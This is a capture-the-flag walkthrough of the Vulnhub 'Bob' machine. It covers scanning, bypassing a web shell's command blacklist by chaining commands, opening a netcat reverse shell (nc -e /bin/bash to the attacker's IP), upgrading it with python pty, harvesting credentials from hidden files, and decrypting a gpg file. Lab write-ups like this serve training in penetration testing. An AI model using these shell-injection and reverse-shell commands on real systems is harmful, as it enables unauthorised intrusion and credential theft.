Vulnhub’s Bob:A Walkthrough
Hello readers,
This is a writeup of Bob machine,found on Vulnhub’s platform.The production credits go to c0rruptedb1t.
You can get the machine from here-https://download.vulnhub.com/bob/Bob_v1.0.1.ova
RECONAISSANCE
Let’s start off,by using ‘netdiscover’ command, to find the victim machine’s IP
Conduct the Nmap scan, with stealth and verbose switches enabled. We get,
ENUMERATION
Targeting the FTP Server running on port 21,we try the classic anonymous login attempt. It backfires since the anonymous user requires a password.Keep in mind that the credentials for an anonymous FTP login are:-
Username-ftp
Password-<space bar>
Moving our attention to http port, let ‘s power on the Firefox engine and type in the IP Address of the box.
Browsing through each section, we make our way through the website.
At the ‘News’ section’s page source,we find
We keep this in mind, and move on.
At the ‘Contact Us’ page, we find a list of people’s names. These could be possible users on the machine/web server.
Heading over to the ‘Login Page’, we find this message:-
No login system to bruteforce our way through. Sigh
Poking through it’s page source, we find the following message left for us.
Web Shell! It sounds more of a reverse shell grab opportunity.
Remember the encoded message that we found earlier, let’s attempt to decrypt it. Storing the string into a file named ‘Decode’ and we perform the following command:-
Command-base64 ‐‐ decode Decode >> Decode
We are in fact storing the decoded result into the same file. Viewing the file’s output,we get:-
passwords.html seems like a possible webpage on the server.Now’ let’s undertake a dirbuster scan on the website
Command-dirb http://<IP>
Enumerating the ‘robots.txt’ file, we get:-
Enumerating each webpage, we find:-
a)login.php- Does’nt exist
b)dev_shell.php-Looks like a remote machine shell, in which we can enter commands
c)lat_memo.html-Nothing of note from the page source
d)passwords.html-As supected, it is a webpage on the server
Going through the clues that we have, it seems Bob is the web server’s administrator.
I had a strong feeling if the above text was of Ook or Brainfuck format. When analyzing the text using decoders, it was giving out gibberish text.
Shifting our attention to the web shell, we start off by giving simple commands. The shell, belongs to the victim machine and gives out information that we need to know
Command -whoami
Command-sudo -l
Command-ls
How to approach such shells?
When entering commands such as ‘ls’ we were not allowed to view the output/rejected output
What to do?
Usage of ‘;|? or ‘’;;||??
When providing these symbols between two commands,it will raise the possibility of generating output for atleast one command
Example pwd||ls ←(No space) or pwd|ls ←(Output may be generated)
Adopting this approach, we perform a few commands:-
Command-pwd |ls
In the directory listing, we find that there is a file named ‘dev_shell.php.bak’.We attempt to download it.
Comamnd- wget http:<IP>/dev_shell.php.bak
Analyzing it’s contents, we understand that the symbols ‘ and ; are blacklisted, hence providing no output
GAINING ACCESS
Now.it’s time to insert our reverse shell. We attempt 4 methods of reverse shell:-
We take the reverse shell code snippets from Pentestmonkey’s cheat sheet-http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
We set up our command in the web shell, in the following method:-
Command- whoami && <Reverse Shell Snippet Code>
NOTE:Make sure to edit the IP Address,according to your machine’s IP and port of your choice
PHP-Not successful
Python-Not successful
Bash-Not successful
Netcat-For this method, we set up a netcat listener on our terminal
Command-nc -lvp 4444
Command to be run on webshell:-
Command-whoami && nc -e /bin/bash 192.168.43.176 4444
Upon hitting enter, our netcat listener will gain the reverse shell on Millburg High School’s server
We are currently operating as the ‘www-data’ user and we need a more standard shell. Fortunately, we have a python one-liner command to elevate ourselves
LEVERAGING OUR SHELL
Command-python -c ‘import pty;pty.spawn(“/bin/bash”)’
While viewing the directory listing of /html, we find a file named hint. In attempting to read it’s contents, we are thrown some gibberish as display text. Let’s try the alternate method of using commands ‘head’ and ‘tail’
Command-head .hint
Not finding anything else useful in /html, we switch over to /home.
We find 4 directories:-
a)/bob-Nothing interesting of note, except for a hidden file named ‘.old_passwordfile.html’.Note that the file is not accessible using ‘cat command. Instead we use ‘head’ command(allowing us to read the top portion of the file).From the file, we get,‘seb’ and ‘james’ user’s credentials:-
b)/seb-Nothing interesting of note
c)/james-Nothing interesting of note
d)/elliot-b)/elliot-Within ellliot’s directory, we find a file named ‘theadminisdumb.txt’.Reading it’s contents, we find:-
LEVERAGING PRIVILEGES
Having got elliot’s credentials, we login as elliot user.
NOTE:All the while we were working through the directory listing,to discover hidden files
Elliot does not have sudo privilege, nor do we find any writable text files to elevate ourselves through privilege escalation. Clearly, we were missing something
Again moving to /bob, we catch sight of 3 more hidden files within his Documents folder. The directory listing is shown below:-
Targeting the ‘staff.txt’ file first, we get:-
At first glance, we can understand that ‘login.txt’ file is encrypted using GNU Privacy Guard(gpg) encryption. It remains unlocked, till we find a suitable passphrase
‘Secret’ seems to be a directory. It is a nested and we make our way through it. At /No_Lookie_In_Here, the directory listing gives us a file named ‘notes.sh’
NOTE:It is a large file and we need to apply both ‘head’ and ‘tail’ commands to grab it’s contents
I admit it was not making any sense. This could probably be a conversation between the system’s users, but we are unable to grasp any meaning. More worrying is that we have a file waiting to be decrypted.
In the English language, there exists a term called ‘acrostic’, in which the starting alphabets of sentence, form a complete word. I admit I wasn't aware of such a concept.
Upon closer inspection, we piece together each starting alphabet to form a word:-
H A R P O C R A T E S
Fun trivia- Harpocrates is in fact, the Greek god of Confidentiality and Secrecy
It’s fitting for the machine’s and InfoSec student’s aim.
Using the passphrase to decrypt the file,
Command- gpg ‐ ‐ batch ‐ ‐passphrase HARPOCRAETES -d login.txt.gpg
We extract the following file and it’s contents:-
Having got bob’s credentials,we login as ‘bob’ to find the flag waiting for us in / directory’s listing.
REPORTING
Well,you have it now!
Conclusion
Well. that was a pretty fun box to play.I would defo recommend this machine to any aspiring pentester. Until then,let me find more boxes to pwn!